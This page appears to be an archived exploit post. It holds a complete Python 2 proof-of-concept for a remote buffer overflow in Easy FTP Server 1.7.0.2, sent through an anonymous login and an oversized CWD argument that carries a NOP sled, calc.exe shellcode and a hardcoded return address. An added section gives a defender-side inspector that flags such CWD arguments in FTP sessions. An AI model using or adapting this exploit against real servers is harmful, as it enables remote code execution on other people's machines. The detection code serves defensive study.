Easy FTP Server v1.7.0.2 CWD Remote BoF
Source: jonbutler88[at]googlemail[dot]com  Author: athleet  Published: 2010-02-23

#!/usr/bin/python
# Easy FTP Server 1.7.0.2 - CWD command remote buffer overflow PoC (Python 2)
# Tested on: XP SP3 (Eng)
import socket, sys

print """
*************************************************
*      Easy FTP Server 1.7.0.2 Remote BoF       *
*           Discovered by: athleet              *
*       jonbutler88[at]googlemail[dot]com       *
*************************************************
"""

if len(sys.argv) != 3:
    print "Usage: ./easyftp.py <Target IP> <Port>"
    sys.exit(1)

target = sys.argv[1]
port = int(sys.argv[2])

# Calc.exe PoC shellcode - Tested on XP Pro SP3 (Eng)
#
# B *0X009AFE44
#
shellcode = (
    "\xba\x20\xf0\xfd\x7f"      # MOV EDX,7FFDF020
    "\xc7\x02\x4c\xaa\xf8\x77"  # MOV DWORD PTR DS:[EDX],77F8AA4C
    "\x33\xC0"                  # XOR EAX,EAX
    "\x50"                      # PUSH EAX
    "\x68\x63\x61\x6C\x63"      # PUSH 636C6163 ("calc")
    "\x54"                      # PUSH ESP
    "\x5B"                      # POP EBX
    "\x50"                      # PUSH EAX
    "\x53"                      # PUSH EBX
    "\xB9\xC7\x93\xC2\x77"      # MOV ECX,77C293C7
    "\xFF\xD1"                  # CALL ECX
    "\xEB\xF7"                  # JMP SHORT 009AFE5B
)

# NOP-pad the shellcode so the return address sits at offset 268
nopsled = "\x90" * (268 - len(shellcode))

ret = "\x58\xFD\x9A\x00"

payload = nopsled + shellcode + ret  # 272 bytes

print "[+] Launching exploit against " + target + "..."
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    s.connect((target, port))
    print "[+] Connected!"
except socket.error:
    print "[!] Connection failed!"
    sys.exit(0)

# Anonymous login, then the oversized CWD argument
s.recv(1024)
s.send('USER anonymous\r\n')
s.recv(1024)
s.send('PASS anonymous\r\n')
s.recv(1024)

print "[+] Sending payload..."
s.send('CWD ' + payload + '\r\n')

# A reply means the server survived; a dropped connection means it crashed
try:
    s.recv(1024)
    print "[!] Exploit failed..."
except socket.error:
    print "[+] Exploited ^_^"
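Added example, not part of the original advisory or the author's code: a defender-side inspector for FTP control-channel lines that flags CWD arguments shaped like the overflow above (overlong, non-printable, with a NOP sled). The thresholds MAX_ARG_LEN and NOP_RUN and the sample session are assumptions constructed for this example; no real shellcode is used.

```python
import re

MAX_ARG_LEN = 255   # assumed threshold: paths on the control channel are rarely longer
NOP_RUN = 16        # assumed: this many consecutive 0x90 bytes is treated as a NOP sled
FTP_VERB = re.compile(rb"^([A-Za-z]{3,4})(?:[ ](.*))?$", re.S)

def parse_ftp_command(line):
    """Split one control-channel line (bytes, CRLF optional) into (VERB, argument)."""
    line = line.rstrip(b"\r\n")
    m = FTP_VERB.match(line)
    if not m:
        return None, line
    return m.group(1).upper(), m.group(2) or b""

def inspect_ftp_command(line):
    """Return a list of findings for one command; an empty list means nothing suspicious."""
    verb, arg = parse_ftp_command(line)
    findings = []
    if verb is None:
        return ["unparseable command line"]
    if len(arg) > MAX_ARG_LEN:
        findings.append("%s argument is %d bytes (limit %d)" % (verb.decode(), len(arg), MAX_ARG_LEN))
    non_printable = sum(1 for b in arg if b < 0x20 or b > 0x7e)
    if non_printable:
        findings.append("%d non-printable bytes in argument" % non_printable)
    longest = max((len(r) for r in re.findall(rb"\x90+", arg)), default=0)
    if longest >= NOP_RUN:
        findings.append("NOP sled: %d consecutive 0x90 bytes" % longest)
    return findings

def scan_session(lines):
    """Inspect every line of a session; return {line_index: findings} for flagged lines only."""
    return {i: f for i, f in ((i, inspect_ftp_command(l)) for i, l in enumerate(lines)) if f}

# Constructed sample session: a normal login and CWD, then a CWD shaped like the
# 272-byte overflow (NOP sled + filler + 4-byte placeholder address "BBBB").
SAMPLE_SESSION = [
    b"USER anonymous\r\n",
    b"PASS anonymous\r\n",
    b"CWD /pub/incoming\r\n",
    b"CWD " + b"\x90" * 200 + b"A" * 68 + b"BBBB" + b"\r\n",
]

if __name__ == "__main__":
    for idx, findings in sorted(scan_session(SAMPLE_SESSION).items()):
        print("line %d: %s" % (idx, "; ".join(findings)))
```

Run over a pcap-derived list of control-channel lines, only the oversized CWD is reported; the same checks apply to any verb, so a server-side length cap on CWD arguments is the corresponding mitigation.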


CopyRight © 2002-2022 VFocuS.Net All Rights Reserved